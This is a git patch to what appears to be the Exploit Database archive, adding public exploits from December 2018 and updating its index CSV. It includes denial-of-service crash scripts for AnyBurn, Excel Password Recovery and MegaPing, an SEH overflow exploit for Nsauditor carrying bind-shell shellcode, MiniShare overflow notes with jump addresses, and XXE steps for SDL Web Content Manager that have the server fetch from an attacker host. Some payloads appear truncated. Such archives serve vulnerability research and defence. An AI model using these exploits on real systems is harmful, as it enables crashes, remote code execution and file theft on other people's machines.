From c6ebf8bc236af0b9ee3c383c03282c0f01a37f01 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 19 Dec 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-12-19 10 changes to exploits/shellcodes VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC) Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write AnyBurn 4.3 - Local Buffer Overflow Denial of Service Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service MegaPing - Local Buffer Overflow Denial of Service Exim 4.41 - 'dns_build_reverse' Local Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2) Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2) Microsoft Windows Server 2003 - Token Kidnapping Local Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation VMware Fusion 2.0.5 - vmx86 kext Local Nsauditor 3.0.28.0 - Local SEH Buffer Overflow Google Android 2.0 < 2.1 - Reverse Shell Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP) MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method SDL Web Content Manager 8.5.0 - XML External Entity Injection --- exploits/osx/{local => dos}/10078.c | 0 exploits/windows/dos/46001.html | 149 ++++++++++++++++ exploits/windows/dos/46002.py | 28 +++ exploits/windows/dos/46003.py | 28 +++ exploits/windows/dos/46004.py | 28 +++ exploits/windows/local/46005.py | 65 +++++++ exploits/windows/remote/45999.txt | 263 ++++++++++++++++++++++++++++ exploits/xml/webapps/46000.txt | 33 ++++ files_exploits.csv | 17 +- 9 files changed, 606 insertions(+), 5 deletions(-) rename exploits/osx/{local => dos}/10078.c (100%) create mode 100644 exploits/windows/dos/46001.html create mode 100755 exploits/windows/dos/46002.py create mode 100755 exploits/windows/dos/46003.py create mode 100755 exploits/windows/dos/46004.py create mode 100755 exploits/windows/local/46005.py create mode 100644 exploits/windows/remote/45999.txt create mode 100644 exploits/xml/webapps/46000.txt diff --git a/exploits/osx/local/10078.c b/exploits/osx/dos/10078.c similarity index 100% rename from exploits/osx/local/10078.c rename to exploits/osx/dos/10078.c diff --git a/exploits/windows/dos/46001.html b/exploits/windows/dos/46001.html new file mode 100644 index 000000000..d6aacb53b --- /dev/null +++ b/exploits/windows/dos/46001.html @@ -0,0 +1,149 @@ + + + + + + + \ No newline at end of file diff --git a/exploits/windows/dos/46002.py b/exploits/windows/dos/46002.py new file mode 100755 index 000000000..4757cb322 --- /dev/null +++ b/exploits/windows/dos/46002.py @@ -0,0 +1,28 @@ +# Exploit Title: AnyBurn +# Date: 15-12-2018=20 +# Vendor Homepage: http://www.anyburn.com/ +# Software Link : http://www.anyburn.com/anyburn_setup.exe +# Exploit Author: Achilles +# Tested Version: 4.3 (32-bit) +# Tested on: Windows 7 x64 +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow +=20 +# Steps to Produce the Crash:=20 +# 1.- Run python code : AnyBurn.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open AnyBurn choose 'Copy disk to Image' +# 4.- Paste the content of EVIL.txt into the field: 'Image file name' +# 5.- Click 'Create Now' and you will see a crash. + +#!/usr/bin/env python + +buffer =3D "\x41" * 10000 + +try: +=09f=3Dopen("Evil.txt","w") +=09print "[+] Creating %s bytes evil payload.." %len(buffer) +=09f.write(buffer) +=09f.close() +=09print "[+] File created!" +except: +=09print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/46003.py b/exploits/windows/dos/46003.py new file mode 100755 index 000000000..7e79ec230 --- /dev/null +++ b/exploits/windows/dos/46003.py @@ -0,0 +1,28 @@ +# Exploit Title: Excel Password Recovery Professional +# Date: 15-12-2018 +# Vendor Homepage:https://www.recoverlostpassword.com/ +# Software Link :https://www.recoverlostpassword.com/downloads/excel_password_recovery_pro_trial.exe +# Exploit Author: Achilles +# Tested Version: 8.2.0.0 +# Tested on: Windows 7 64 +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow + +# Steps to Produce the Crash: +# 1.- Run python code : Excel_Password_Recovery.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Excel Password Recovery Professional +# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Registrations Code' +# 5.- Click 'Register' and you will see a crash. + +#!/usr/bin/env python + +buffer = "\x41" * 5000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/46004.py b/exploits/windows/dos/46004.py new file mode 100755 index 000000000..53fd7c756 --- /dev/null +++ b/exploits/windows/dos/46004.py @@ -0,0 +1,28 @@ +# Exploit Title: MegaPing +# Date: 15-12-2018 +# Vendor Homepage: http://www.magnetosoft.com/ +# Software Link: http://www.magnetosoft.com/downloads/win32/megaping_setup.exe +# Exploit Author: Achilles +# Tested Version: +# Tested on: Windows 7 x64 +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow + +# Steps to Produce the Crash: +# 1.- Run python code : MegaPing.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open MegaPing choose from the left side: 'Finger' +# 4.- Paste the content of EVIL.txt into the field: 'Destination Address List' +# 5.- Click 'Start' and you will see a crash. + +#!/usr/bin/env python + +buffer = "\x41" * 8000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46005.py b/exploits/windows/local/46005.py new file mode 100755 index 000000000..2de8d5a66 --- /dev/null +++ b/exploits/windows/local/46005.py @@ -0,0 +1,65 @@ +# Exploit Title: Nsauditor Local SEH Buffer Overflow +# Date: 15-12-2018 +# Vendor Homepage:http://www.nsauditor.com +# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Exploit Author: Achilles +# Tested Version: 3.0.28.0 +# Tested on: Windows XP SP3 + + +# 1.- Run python code : Nsauditor.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Nsauditor +# 4.- In the Window select 'Tools' > 'Dns Lookup' +# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query' +# 6.- Click 'Resolve' +# 7.- Connect with Netcat on port 3110 + +#!/usr/bin/python + +buffer = "\x41" * 5235 +NSEH = "\xeb\x06\x90\x90" #jmp short 6 +SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll +nops = "\x90" * 20 + +#badchar \x00\x0a\x0d\x2e +#msfvenom Bind port 3110 +buf = "" +buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29" +buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95" +buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15" +buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac" +buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1" +buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29" +buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63" +buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc" +buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3" +buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56" +buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6" +buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c" +buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03" +buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08" +buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f" +buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c" +buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d" +buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73" +buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba" +buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83" +buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe" +buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6" +buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7" +buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9" +buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc" +buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9" +buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc" +buf += "\x12\x2f\xe4\xc4" + +payload = buffer + NSEH + SEH + nops + buf +try: + f=open("EVIL.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/remote/45999.txt b/exploits/windows/remote/45999.txt new file mode 100644 index 000000000..5cd7abe2d --- /dev/null +++ b/exploits/windows/remote/45999.txt @@ -0,0 +1,263 @@ +Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST +methods are also vulnerable. The difference is minimal, both are exploited +in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length + +------------------------------------------------------------------- + +EAX 00000000 +ECX 77C3EF3B msvcrt.77C3EF3B +EDX 00F14E38 +EBX 43346843 +ESP 01563908 ASCII +"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co +HTTP/1.1 +" +EBP 0156BB90 +ESI 00000001 +EDI 01565B68 +EIP 68433568 +C 0 ES 0023 32bit 0(FFFFFFFF) +P 1 CS 001B 32bit 0(FFFFFFFF) +A 1 SS 0023 32bit 0(FFFFFFFF) +Z 0 DS 0023 32bit 0(FFFFFFFF) +S 0 FS 003B 32bit 7FFDD000(FFF) +T 0 GS 0000 NULL +D 0 +O 0 LastErr ERROR_SUCCESS (00000000) +EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) +ST0 empty +ST1 empty +ST2 empty +ST3 empty +ST4 empty +ST5 empty +ST6 empty +ST7 empty + 3 2 1 0 E S P U O Z D I +FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) +FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 + +------------------------------------------------------------------------------ + +Only 210 bytes to shellcode + +------------------------------------------------------------------------------ + +Badchars '00','0d' + +------------------------------------------------------------------------------ + +>findjmp kernel32.dll esp - XP SP 3 English + +Scanning kernel32.dll for code useable with the esp register +0x7C809F83 call esp +0x7C8369E0 call esp +0x7C83C2C5 push esp - ret +0x7C87641B call esp + + + + + + \ No newline at end of file diff --git a/exploits/xml/webapps/46000.txt b/exploits/xml/webapps/46000.txt new file mode 100644 index 000000000..24bc8698b --- /dev/null +++ b/exploits/xml/webapps/46000.txt @@ -0,0 +1,33 @@ +###################### +# Author Information # +###################### +Author : Ahmed Elhady Mohamed +twitter : @Ahmed__ELhady +Company : Canon Security +Date : 25/11/2018 +######################## +# Software Information # +######################## +Affected Software : SDL Web Content Manager +Version: Build 8.5.0 +Vendor: SDL Tridion +Software website : https://www.sdl.com +CVE Number: CVE-2018-19371 +############### +# Description # +############### +SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network. +################# +# Exploit Steps # +################# +1- Access the application with any user account +2- it will ask you to choose your language preferences +3-the application sent a request to SaveUserSettings web service with XML content in the request body. +4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80 +5- intercept the request using Burpsuite proxy tool +6- inject the following payload in the beginning of the XML value. +%asd;%c;]> +&rrr; +7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server. +8- send the request to the server. +9- The application server will connect to the attacker server \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f52de96a6..8dd0eeddd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1247,6 +1247,7 @@ id,file,description,date,author,type,platform,port 10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",dos,windows, 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21 10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389 +10078,exploits/osx/dos/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)",2009-10-02,mu-b,dos,osx, 33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,dos,hardware, 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515 10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows, @@ -6215,6 +6216,10 @@ id,file,description,date,author,type,platform,port 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple, 45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows, 45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows, +46001,exploits/windows/dos/46001.html,"Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write",2018-12-18,"Google Security Research",dos,windows, +46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows, +46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows, +46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -6376,7 +6381,7 @@ id,file,description,date,author,type,platform,port 741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,local,linux, 744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",local,linux, 749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",local,windows, -756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-01-15,"Rafael Carrasco",local,linux, +756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow",2005-01-15,"Rafael Carrasco",local,linux, 758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,local,osx, 760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,local,windows, 763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,local,linux,79 @@ -6432,7 +6437,7 @@ id,file,description,date,author,type,platform,port 937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,local,windows, 938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,local,windows, 950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,local,linux, -951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",local,windows, +951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)",2005-04-22,"Jean Luc",local,windows, 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows, 964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows, 965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,local,windows, @@ -6795,7 +6800,7 @@ id,file,description,date,author,type,platform,port 6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,local,windows, 6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,local,linux, 6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows, -6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local",2008-10-08,"Cesar Cerrudo",local,windows, +6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows, 6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows, 6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows, 6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows, @@ -7134,7 +7139,6 @@ id,file,description,date,author,type,platform,port 10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",local,linux, 10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple, 10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,local,osx, -10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local",2009-10-02,mu-b,local,osx, 33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",local,windows, 10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",local,windows, 10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,local,windows, @@ -10149,6 +10153,7 @@ id,file,description,date,author,type,platform,port 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows, 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows, 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows, +46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -11779,7 +11784,7 @@ id,file,description,date,author,type,platform,port 15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,remote,windows, 15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,remote,windows, 15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,remote,windows, -15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",remote,android, +15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)",2010-11-05,"MJ Keith",remote,android, 15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows, 15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows, 15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",remote,windows, @@ -17008,6 +17013,7 @@ id,file,description,date,author,type,platform,port 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos, +45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40494,3 +40500,4 @@ id,file,description,date,author,type,platform,port 45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php, 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php, 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php, +46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,